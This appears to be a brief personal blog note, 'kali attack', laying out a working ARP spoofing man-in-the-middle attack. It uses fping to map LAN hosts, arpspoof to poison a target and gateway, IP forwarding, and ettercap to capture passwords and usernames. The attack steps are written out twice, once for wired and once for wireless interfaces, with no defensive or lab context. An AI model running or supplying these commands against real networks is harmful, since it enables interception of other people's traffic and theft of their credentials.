kali attack(2016-09-02)

arp attack

  • synopsis

arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
arpspoof -i eth0 -t 192.168.0.102 192.168.0.1 //arp attack
fping -asg 192.198.0.1/24 //inquire the ip addr on lan( local are network)
fping -g 192.168.0.1/24
echo 1 > /proc/sys/net/ipv4/ip_forward//ip data packets redirect


ettercap

  • synopsis: If IPv6 is enabled:
    TARGET is in the form MAC/IPs/IPv6/PORTs
    Otherwise,
    TARGET is in the form MAC/IPs/PORTs
    where IPs and PORTs can be ranges (e.g. /192.168.0.1-30,40,50/20,22,25)

ettercap -Tq -i eth0 //when arp attack succeeds, we can use ettercap to acquire the datas of the host ,such as password ,ip ,username etc.

---

ifconfig
fping -g 192.168.0.1/24
arpspoof -i wlan0 -t 192.168.0.101 192.168.0.103
cd /proc/sys/net/ipv4
cat ip_forward
138 echo 1 > ip_forward
139 cat ip_forward
ettercap -Tq -i wlan0

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容